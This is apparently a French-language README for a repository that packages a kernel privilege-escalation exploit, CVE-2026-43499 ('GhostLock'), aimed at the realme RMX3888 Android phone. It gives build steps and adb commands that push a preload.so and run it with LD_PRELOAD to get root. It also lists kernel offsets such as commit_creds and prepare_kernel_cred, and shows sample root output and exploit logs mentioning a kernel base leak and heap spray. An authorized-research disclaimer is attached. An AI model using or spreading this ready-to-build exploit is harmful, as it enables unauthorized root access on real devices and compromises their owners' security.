
Configuration d'exploit CVE-2026-43499 pour realme RMX3888 (Android 16) - 20 offsets de noyau vérifiés
Ce dépôt contient les fichiers de configuration complets pour l'exploit CVE-2026-43499 (GhostLock) ciblant l'appareil realme RMX3888. Tous les offsets du noyau ont été extraits et vérifiés à partir du boot.img de l'appareil.
✓ 20 offsets noyau vérifiés extraits de vmlinux
✓ Journalisation en temps réel avec O_SYNC + fsync pour la sécurité en cas de panique noyau
✓ Configuration spécifique à l'appareil pour RMX3888
✓ Script de compilation en une commande avec détection automatique du NDK
✓ Documentation complète avec guides de compilation
ealtime_log.h - Implémentation de la journalisation en temps réel
ound2_report.md - Rapport de configuration (Round 2)
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Sous Windows Git Bash, le script détecte automatiquement le chemin SDK par défaut utilisé par Android Studio et les outils en ligne de commande : /c/Android/Sdk/ndk/*.
Remarque : ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL et COPY_SPLICE_READ utilisent actuellement des solutions de repli compatibles avec la compilation dans l'en-tête cible RMX3888. Remplacez-les par des offsets vmlinux RMX3888 vérifiés avant de vous fier au comportement à l'exécution.
# Envoyer sur l'appareil
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Définir les permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Exécuter l'exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Vérifier les journaux
adb shell cat /sdcard/Download/log_*.txt
Les principaux offsets ci-dessous ont été extraits du noyau 6.1.141. Voir la remarque ci-dessus pour les entrées de repli compatibles avec la compilation qui nécessitent encore une vérification spécifique à RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 autres offsets vérifiés
Le module de journalisation en temps réel intégré fournit :
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Consultez BUILD_GUIDE.md pour des instructions de dépannage détaillées, notamment :
⚠️ AVERTISSEMENT : Cette configuration est destinée uniquement à la recherche en sécurité autorisée.
Cette configuration est fournie à des fins éducatives et de recherche en sécurité uniquement.
Ce dépôt contient des documents de recherche en sécurité. Les auteurs et contributeurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce code. Utilisez-le à vos propres risques et uniquement sur des appareils vous appartenant ou pour lesquels vous disposez d'une autorisation explicite de test.
Généré : 2026-07-23
Version du noyau : 6.1.141-android14-11-o-gffc54a6d2287
Vérification des offsets : 100 % (20/20)
Statut : Prêt pour la compilation